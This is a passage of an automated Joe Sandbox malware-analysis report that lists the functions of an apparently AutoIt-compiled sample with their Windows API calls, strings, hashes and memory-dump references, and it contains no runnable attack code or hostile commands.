                                                                      • Instruction Fuzzy Hash: DE715E7190020AABDF60EFA4DC45FAEBBB8BF05344F148215FA69E7191D7319A19CB60
                                                                      Function 00CB833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00CB835A
                                                                      • _wcslen.LIBCMT ref: 00CB836E
                                                                      • _wcslen.LIBCMT ref: 00CB8391
                                                                      • _wcslen.LIBCMT ref: 00CB83B4
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00CB83F2
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00CB5BF2), ref: 00CB844E
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CB8487
                                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00CB84CA
                                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00CB8501
                                                                      • FreeLibrary.KERNEL32(?), ref: 00CB850D
                                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CB851D
                                                                      • DestroyIcon.USER32(?,?,?,?,?,00CB5BF2), ref: 00CB852C
                                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00CB8549
                                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00CB8555
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                      • String ID: .dll$.exe$.icl
                                                                      • API String ID: 799131459-1154884017
                                                                      • Opcode ID: 13c11a5c74ad04c4abf3342c7a55b20744ac06309765ec49a6128f53f8976d7d
                                                                      • Instruction ID: 1809a429d07cc3f9acaf789b43c2df1cd825003fdddc45797542a24f98a2990a
                                                                      • Opcode Fuzzy Hash: 13c11a5c74ad04c4abf3342c7a55b20744ac06309765ec49a6128f53f8976d7d
                                                                      • Instruction Fuzzy Hash: 8F61DF71500215BEEB24DF64CC81BFE77ACBB08B11F104609F825E61D1DF74AA88EBA0
                                                                      Function 00C27778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 0-1645009161
                                                                      • Opcode ID: 96c4de2cbe8411f8b13b05df721637833f52bd56ab28223d2e871cd124eeaf7c
                                                                      • Instruction ID: d3e730c23d3cf22af369daef542dc27fefc4b9cad09b02c0f45d8da9bb49c38b
                                                                      • Opcode Fuzzy Hash: 96c4de2cbe8411f8b13b05df721637833f52bd56ab28223d2e871cd124eeaf7c
                                                                      • Instruction Fuzzy Hash: C8812771A04225BBDF21AF61ECC2FAE37B8BF15700F144124F914AB592EB70DA45D7A1
                                                                      Function 00C93E79 Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 205COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?), ref: 00C93EF8
                                                                      • _wcslen.LIBCMT ref: 00C93F03
                                                                      • _wcslen.LIBCMT ref: 00C93F5A
                                                                      • _wcslen.LIBCMT ref: 00C93F98
                                                                      • GetDriveTypeW.KERNEL32(?), ref: 00C93FD6
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C9401E
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C94059
                                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00C94087
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                      • API String ID: 1839972693-4113822522
                                                                      • Opcode ID: f07c2a669653a8cbcf5341ad4a65c8cd267f42082b8bd3cef02de0f3d86c3588
                                                                      • Instruction ID: 82a4bbd308d53944f55ab0f4c7b808855533778403c95d009f174fe97bd5e5f8
                                                                      • Opcode Fuzzy Hash: f07c2a669653a8cbcf5341ad4a65c8cd267f42082b8bd3cef02de0f3d86c3588
                                                                      • Instruction Fuzzy Hash: 9271E1726043119FCB10EF24C88596EB7F4EFA8754F10492DF8A597261EB30EE46DB91
                                                                      Function 00C85A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadIconW.USER32(00000063), ref: 00C85A2E
                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00C85A40
                                                                      • SetWindowTextW.USER32(?,?), ref: 00C85A57
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00C85A6C
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00C85A72
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00C85A82
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00C85A88
                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00C85AA9
                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00C85AC3
                                                                      • GetWindowRect.USER32(?,?), ref: 00C85ACC
                                                                      • _wcslen.LIBCMT ref: 00C85B33
                                                                      • SetWindowTextW.USER32(?,?), ref: 00C85B6F
                                                                      • GetDesktopWindow.USER32 ref: 00C85B75
                                                                      • GetWindowRect.USER32(00000000), ref: 00C85B7C
                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00C85BD3
                                                                      • GetClientRect.USER32(?,?), ref: 00C85BE0
                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00C85C05
                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00C85C2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                      • String ID:
                                                                      • API String ID: 895679908-0
                                                                      • Opcode ID: 38d9bde30aee976cd693cb6ba673956108913a5f5f4eaa778e06a513b10334f1
                                                                      • Instruction ID: 4ec441390a1a65f93575b8df882b3f439ab5b3717f413c284ad8ebb7ff0f6b9a
                                                                      • Opcode Fuzzy Hash: 38d9bde30aee976cd693cb6ba673956108913a5f5f4eaa778e06a513b10334f1
                                                                      • Instruction Fuzzy Hash: E2716E31900B05AFDB20EFA9CE85FAEBBF5FF48708F104618E552A25A0D7B5E944CB54
                                                                      Function 00C830F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 176396367-1603158881
                                                                      • Opcode ID: 74382f99938ee55919c7b9d8d8130859ceb3945a64ce1f8ad067404851304f3c
                                                                      • Instruction ID: 418567503c22e9dda550c5e80cff4974daf12772c414a0dacd3cca091f4c586e
                                                                      • Opcode Fuzzy Hash: 74382f99938ee55919c7b9d8d8130859ceb3945a64ce1f8ad067404851304f3c
                                                                      • Instruction Fuzzy Hash: 84E11731A00696ABCF18AF78C8517EDFBB0BF54B18F149129E466B7240DB30AF859794
                                                                      Function 00C944C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(00000000,00000000,00CBCC08), ref: 00C94527
                                                                      • _wcslen.LIBCMT ref: 00C9453B
                                                                      • _wcslen.LIBCMT ref: 00C94599
                                                                      • _wcslen.LIBCMT ref: 00C945F4
                                                                      • _wcslen.LIBCMT ref: 00C9463F
                                                                      • _wcslen.LIBCMT ref: 00C946A7
                                                                        • Part of subcall function 00C3F9F2: _wcslen.LIBCMT ref: 00C3F9FD
                                                                      • GetDriveTypeW.KERNEL32(?,00CE6BF0,00000061), ref: 00C94743
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 2055661098-1000479233
                                                                      • Opcode ID: 580fa991132b67cce662b53ee5b8e9c29af899da2e6e691cf8a368f0048c6678
                                                                      • Instruction ID: b74bef0c27bb746c59c4da241310d4fc2f50b1694257bd69b7681bacbb6990cb
                                                                      • Opcode Fuzzy Hash: 580fa991132b67cce662b53ee5b8e9c29af899da2e6e691cf8a368f0048c6678
                                                                      • Instruction Fuzzy Hash: 1CB134716083029FCB18DF28C894E6EB7E5BFA5760F10491DF0A6C7291D730DA46CBA2
                                                                      Function 00C2326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetMenuItemCount.USER32(00CF1990), ref: 00C62F8D
                                                                      • GetMenuItemCount.USER32(00CF1990), ref: 00C6303D
                                                                      • GetCursorPos.USER32(?), ref: 00C63081
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00C6308A
                                                                      • TrackPopupMenuEx.USER32(00CF1990,00000000,?,00000000,00000000,00000000), ref: 00C6309D
                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00C630A9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                      • String ID: 0
                                                                      • API String ID: 36266755-4108050209
                                                                      • Opcode ID: 256c3580ad151764b7d078a26811731391f179e48d99109372cabba6cd515709
                                                                      • Instruction ID: b5f4355b998ac3f9727d7046f4ab989f57a8699fa8acc1db8075b197c358cb07
                                                                      • Opcode Fuzzy Hash: 256c3580ad151764b7d078a26811731391f179e48d99109372cabba6cd515709
                                                                      • Instruction Fuzzy Hash: 7F713A30640656BEEB319F65DCC9FAABF69FF04324F200216F5246A1E1C7B1AE14D751
                                                                      Function 00CB6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?), ref: 00CB6DEB
                                                                        • Part of subcall function 00C26B57: _wcslen.LIBCMT ref: 00C26B6A
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00CB6E5F
                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00CB6E81
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CB6E94
                                                                      • DestroyWindow.USER32(?), ref: 00CB6EB5
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00C20000,00000000), ref: 00CB6EE4
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CB6EFD
                                                                      • GetDesktopWindow.USER32 ref: 00CB6F16
                                                                      • GetWindowRect.USER32(00000000), ref: 00CB6F1D
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00CB6F35
                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00CB6F4D
                                                                        • Part of subcall function 00C39944: GetWindowLongW.USER32(?,000000EB), ref: 00C39952
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                      • String ID: 0$tooltips_class32
                                                                      • API String ID: 2429346358-3619404913
                                                                      • Opcode ID: b17c0806ab0aca397e542d5d007c13d3b19de138c71c44c9c0d97779a05b2c46
                                                                      • Instruction ID: 521a7cc510dc17704c36d3b56075bbfcb2c7aeae782f3367723b5034012c1ffa
                                                                      • Opcode Fuzzy Hash: b17c0806ab0aca397e542d5d007c13d3b19de138c71c44c9c0d97779a05b2c46
                                                                      • Instruction Fuzzy Hash: 01716575504284AFDB21CF68D888FBABBE9EB89304F08051DF99997261C774EA05DB12
                                                                      Function 00CB911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • DragQueryPoint.SHELL32(?,?), ref: 00CB9147
                                                                        • Part of subcall function 00CB7674: ClientToScreen.USER32(?,?), ref: 00CB769A
                                                                        • Part of subcall function 00CB7674: GetWindowRect.USER32(?,?), ref: 00CB7710
                                                                        • Part of subcall function 00CB7674: PtInRect.USER32(?,?,00CB8B89), ref: 00CB7720
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00CB91B0
                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00CB91BB
                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00CB91DE
                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00CB9225
                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00CB923E
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00CB9255
                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 00CB9277
                                                                      • DragFinish.SHELL32(?), ref: 00CB927E
                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00CB9371
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                      • API String ID: 221274066-3440237614
                                                                      • Opcode ID: 663d08c32b158767ea6cb1fb6676705f0afc1dd2de7d668c74911ebcafa36049
                                                                      • Instruction ID: 4b8e4a0a60e5eee8c7dab1de0c9a4d9b1ff37034336facebacd97d713e5f21b5
                                                                      • Opcode Fuzzy Hash: 663d08c32b158767ea6cb1fb6676705f0afc1dd2de7d668c74911ebcafa36049
                                                                      • Instruction Fuzzy Hash: 03615C71108301AFD701DF64DC85EAFBBE8EF99750F000A2DF595931A1DB709A49DB52
                                                                      Function 00C9C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C9C4B0
                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C9C4C3
                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C9C4D7
                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C9C4F0
                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00C9C533
                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C9C549
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C9C554
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C9C584
                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00C9C5DC
                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00C9C5F0
                                                                      • InternetCloseHandle.WININET(00000000), ref: 00C9C5FB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                      • String ID:
                                                                      • API String ID: 3800310941-3916222277
                                                                      • Opcode ID: 94c8973795cfbd06fb02c4685ae392dd25a850c56b24b8124b071a5c431075d2
                                                                      • Instruction ID: d4b462e46767f5a2243277ed4331e0d5de7c98368ed0219a89f1acaf4e69d41c
                                                                      • Opcode Fuzzy Hash: 94c8973795cfbd06fb02c4685ae392dd25a850c56b24b8124b071a5c431075d2
                                                                      • Instruction Fuzzy Hash: 895129B1600608BFEB219F65C9C8BBB7BFCFB08754F004519F956D6250DB34EA44AB61
                                                                      Function 00CB856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00CB8592
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CB85A2
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CB85AD
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CB85BA
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00CB85C8
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CB85D7
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00CB85E0
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CB85E7
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 00CB85F8
                                                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,00CBFC38,?), ref: 00CB8611
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00CB8621
                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00CB8641
                                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00CB8671
                                                                      • DeleteObject.GDI32(?), ref: 00CB8699
                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00CB86AF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                      • String ID:
                                                                      • API String ID: 3840717409-0
                                                                      • Opcode ID: 1fea1aee250b5ae3dd23b6120a55a55a4b3e71205f552110173114745fb88d5d
                                                                      • Instruction ID: 2b8de416996de828d150d9e47eb9d5cf8278d487819d0dd5b6f8d2d1164d646b
                                                                      • Opcode Fuzzy Hash: 1fea1aee250b5ae3dd23b6120a55a55a4b3e71205f552110173114745fb88d5d
                                                                      • Instruction Fuzzy Hash: 98410975600205AFDB119FA5DC88FAE7BBCEF89B11F104159F915E7260DB709A05CB60
                                                                      Function 00C914BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(00000000), ref: 00C91502
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00C9150B
                                                                      • VariantClear.OLEAUT32(?), ref: 00C91517
                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00C915FB
                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00C91657
                                                                      • VariantInit.OLEAUT32(?), ref: 00C91708
                                                                      • SysFreeString.OLEAUT32(?), ref: 00C9178C
                                                                      • VariantClear.OLEAUT32(?), ref: 00C917D8
                                                                      • VariantClear.OLEAUT32(?), ref: 00C917E7
                                                                      • VariantInit.OLEAUT32(00000000), ref: 00C91823
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
